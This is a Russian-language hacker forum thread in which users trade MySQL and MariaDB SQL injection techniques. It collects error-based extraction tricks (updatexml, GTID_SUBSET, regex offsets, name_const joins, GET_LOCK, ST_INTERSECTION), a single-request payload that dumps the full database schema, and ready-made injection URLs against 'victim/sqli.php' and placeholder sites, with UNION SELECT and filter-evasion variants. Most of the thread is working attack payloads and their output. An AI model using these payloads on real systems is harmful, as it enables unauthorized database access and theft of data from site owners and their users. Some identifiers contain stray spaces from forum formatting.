Help по MySql инъекциям

[l1ght]

пожалуй это самый большой сдвиг в sql inj с момента публикаций qwazar'а

Цитата:

Вы должны добавить отзыв кому-то ещё, прежде чем сможете снова добавить его NameSpace.

дайте ему уже медаль генералиссимуса))

Цитата:

mysql> SELECT host FROM mysql.user ORDER BY 1 LIMIT 0 PROCEDURE ANALYSE (0, (SELECT 3 ORDER BY updatexml(1, concat(0x3A, version()), 1)));

или ещё более коротко procedure analyse (0,updatexml(1,concat(0x3a,version()),1))
mysql >5.1.5

[BlackFan]

MySQL >= 5.6.5 Error based
Максимальная длина строки 200 символов

Код:

select GTID_SUBSET(@@version,0);
ERROR 1772 (HY000): Malformed GTID set specification '5.6.20-enterprise-commercial-advanced'.


select GTID_SUBTRACT(@@version,0);
ERROR 1772 (HY000): Malformed GTID set specification '5.6.20-enterprise-commercial-advanced'.

[faza02]

находил еще давно, однако максимум до чего дошел - вывод двух полей. вчера случайно обнаружил, что можно намного больше.

аналог concat, в роли separator запятая по дефолту.

Код:

SELECT MAKE_SET(-1,@@version,database(),user(),@@version,user(),database());
5.1.69,u192295142_root,u192295142_root@localhost,5.1.69,u192295142_root@localhost,u192295142_root

[NameSpace]

Если очень хочется concat, а запятой нет - поможет group_concat:

Код:

mysql> SELECT group_concat(c) FROM (SELECT (1234)c UNION SELECT 5678)t;
+-----------------+
| group_concat(c) |
+-----------------+
| 1234,5678       |
+-----------------+
1 row in set (0.00 sec)

[man474019]

dump Database in one request #SQLi

part 1

Цитата:

(sElect(@x)from(Select(@x:=0x00), (@running_number:=0),
(sElect(0)from(information_schema.columns)where(ta ble_schema!
=0x696e666f726d6174696f6e5f736368656d61)and(0x00)i n(@x:=concat(@x,0x3c62723e,
(@running_number:=@running_number
%2b1),0x2e20,table_schema,0x3a,table_name,0x3a,col umn_name))))x)

part 2

Цитата:

(sElect(@) from (sElect (@:=0x00), (@running_number:=0),(sElect (@) from (table) where (@) in
(@:=concat(@,(@running_number:=@running_number%2b1 ),0x0a,column,0x3a,column))))a)

exploitable example will be like this

Цитата:

victim/sqli.php?id=45 UNION SELECT 1,(sElect(@x)from(Select(@x:=0x00),
(@running_number:=0),(sElect(0)from(information_sc hema.columns)where(table_schema!
=0x696e666f726d6174696f6e5f736368656d61)and(0x00)i n(@x:=concat(@x,0x3c62723e,
(@running_number:=@running_number
%2b1),0x2e20,table_schema,0x3a,table_name,0x3a,col umn_name))))x),3,4,5,6,7,8,9,10,11,12--

http://paste.ee/r/MGd10
@1x0123

[spari]

MariaDB маленький error-based трюк, с помощью regex.

Код:

SELECT 1 rlike concat(1,0x5b);

Got error 'missing terminating ] for character class at offset 2' from regexp
the [] must be closed, when we remain it open, we get an error of char 2.
we can control the offset using rpad/lpad.

Код:

SELECT 1 rlike rpad(1,123,0x5b);

Got error 'missing terminating ] for character class at offset 123' from regexp

which means, we can extract data using hex(hex()), as it only accept numbers.
limited to 8 chars.

Код:

SELECT 1 rlike rpad(1,substring(hex(hex(version())),1,8),0x5b);
Got error 'missing terminating ] for character class at offset 33313330' from regexp
SELECT 1 rlike rpad(1,substring(hex(hex(version())),8,8),0x5b);
Got error 'missing terminating ] for character class at offset 3245333' from regexp
SELECT 1 rlike rpad(1,substring(hex(hex(version())),16,8),0x5b);
Got error 'missing terminating ] for character class at offset 13245333' from regexp
SELECT 1 rlike rpad(1,substring(hex(hex(version())),24,8),0x5b);
Got error 'missing terminating ] for character class at offset 13335324' from regexp
SELECT 1 rlike rpad(1,substring(hex(hex(version())),32,8),0x5b);
Got error 'missing terminating ] for character class at offset 43444363' from regexp
......

unhex(unhex('3331333032453331324533313335324434443 63137323639363134343432')) = 10.1.15-MariaDB.

[sT1myL]

Подобрать количество полей без union, order && group by можно так:
into @,@,@

http://www.site.ru/page.php?id=13' into @,@,@,@,@,@,@+--+-

[spari]

недавние находки о MySQL:

1)
in sql, if we try to select a column that appears in more than one table, we are getting an error.

Код:

SELECT a from (select 1 a)x join (select 2 a)y
Column 'a' in field list is ambiguous

the column name appears in the error.
we can use a simple trick with natural join to make the column name appear in the error, without selecting it directly.

Код:

select * from(select 1 a)a natural join((select 1 a)b join (select 1 a)c)
Column 'a' in from clause is ambiguous

we got the column name although we didnt selected it directly.
since name_const allows us to give an alias, we can use it to get the version.

Код:

select * from(select name_const(version(),1))a natural join((select name_const(version(),1))b join (select name_const(version(),1))c)
Column '5.7.12-log' in from clause is ambiguous

working with all versions of mysql with name_const (5.0.12+).
in version 5.0.27 we can also pull out data using name_const((select column from table limit 1),1).
another trick is getting the column names of a table.

Код:

select * from(select * from book)a natural join((select * from book)b join (select * from book)c)
Column 'BOOK_CODE' in from clause is ambiguous

select * from(select * from book)a natural join((select * from book)b join (select * from book)c using (BOOK_CODE))
Column 'TITLE' in from clause is ambiguous

select * from(select * from book)a natural join((select * from book)b join (select * from book)c using (BOOK_CODE,TITLE))
Column 'PUBLISHER_CODE' in from clause is ambiguous

2)
in mysql 5.7 + MariaDB, when we give GET_LOCK() a name thats too big, we get an error.

Код:

SELECT GET_LOCK("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",0)
Incorrect user-level lock name 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.

which can also be easily converted into error based injection.

Код:

SELECT GET_LOCK(concat(version(),repeat(0x1,99)),0)
Incorrect user-level lock name '5.7.12-log'.

and ofc shrink the query.
SELECT GET_LOCK(rpad(version(),99,0),0)
SELECT GET_LOCK(repeat(version(),9),0)

RELEASE_LOCK(), IS_FREE_LOCK(), IS_USED_LOCK() are also working.
in MariaDB the error is a bit different.
Identifier name '10.0.34-MariaDB-1~jessie' is too long

3)
in mysql 5.7, the function ST_INTERSECTION() must recieve 2 identical SRID's.
if not, its producing an error.

Код:

SELECT ST_INTERSECTION(ST_GEOMFROMTEXT('POINT(0 0)'),ST_GEOMFROMTEXT('POINT(0 0)',12345));
Binary geometry function st_intersection given two geometries of different srids: 0 and 12345, which should have been identical.

its only accepting numbers, so we can use the same trick from MariaDB regex error based and "illegal double", using hex(hex()).
we will be getting the data by jumping 8 chars every time.

Код:

SELECT ST_INTERSECTION(ST_GEOMFROMTEXT('POINT(0 0)'),ST_GEOMFROMTEXT('POINT(0 0)',length(hex(hex(@@version)))));
Binary geometry function st_intersection given two geometries of different srids: 0 and 40, which should have been identical.

SELECT ST_INTERSECTION(ST_GEOMFROMTEXT('POINT(0 0)'),ST_GEOMFROMTEXT('POINT(0 0)',substring(hex(hex(@@version)),1,8)));
Binary geometry function st_intersection given two geometries of different srids: 0 and 33353245, which should have been identical.
SELECT ST_INTERSECTION(ST_GEOMFROMTEXT('POINT(0 0)'),ST_GEOMFROMTEXT('POINT(0 0)',substring(hex(hex(@@version)),9,8)));
Binary geometry function st_intersection given two geometries of different srids: 0 and 33373245, which should have been identical.
SELECT ST_INTERSECTION(ST_GEOMFROMTEXT('POINT(0 0)'),ST_GEOMFROMTEXT('POINT(0 0)',substring(hex(hex(@@version)),17,8)));
Binary geometry function st_intersection given two geometries of different srids: 0 and 33313332, which should have been identical.
.......

unhex(unhex(3335324533373245333133323244364336463637)) = 5.7.12-log

[sT1myL]

Когда стандартные варианты сделать ложным условия( and false; and 0; null; div 0 ) недоступны
можно воспользоваться конструкций @=1; @< 1 итд.
Пример:

Цитата:

http://www.xxx.com/news.php?id=@=2+UnIoN+SeLEct+1,2,3,4,5,6,7+--+-
http://www.xxx.com/news.php?id=@>2+UnIoN+SeLEct+1,2,3,4,5,6,7+--+-
http://www.xxx.com/news.php?id=@+UnIoN+SeLEct+1,2,3,4,5,6,7+--+-

Так же можно использовать конструкцию polygon(point(1,1))

Цитата:

http://www.xxx.com/news.php?id=polygon(point(1,1))+UnIoN+SeLEct+1,2,3 ,4,5,6,7+--+-